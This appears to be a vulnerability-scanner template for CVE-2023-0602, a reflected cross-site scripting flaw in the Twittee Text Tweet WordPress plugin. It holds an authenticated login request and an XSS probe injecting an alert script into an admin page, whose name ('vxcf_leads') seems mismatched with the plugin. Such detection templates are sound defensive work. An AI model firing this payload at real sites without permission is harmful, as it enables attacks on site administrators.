51 lines
2.0 KiB
YAML
51 lines
2.0 KiB
YAML
id: CVE-2023-0602
|
|
|
|
info:
|
|
name: Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/c357f93d-4f21-4cd9-9378-d97756c75255
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-0602
|
|
- https://wordpress.org/plugins/twittee-text-tweet/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-0602
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00064
|
|
epss-percentile: 0.26671
|
|
cpe: cpe:2.3:a:johnniejodelljr:twittee_text_tweet:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: johnniejodelljr
|
|
product: twittee_text_tweet
|
|
framework: wordpress
|
|
tags: cve,cve2023,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
- |
|
|
GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_2 == 200'
|
|
- 'contains(header_2, "text/html")'
|
|
- 'contains(body_2, "<script>alert(document.domain)</script>") && contains(body_2, "twittee")'
|
|
condition: and
|
|
|
|
# digest: 4a0a00473045022063d220399fc9368d82cf6accefc92c23afc2b948dfdfd71aa5c2f7af902713a2022100fabd857678270a3d1c4c274261774c7441425dda7dd2861718e0b15795e1262d:922c64590222798bb761d5b6d8e72950
|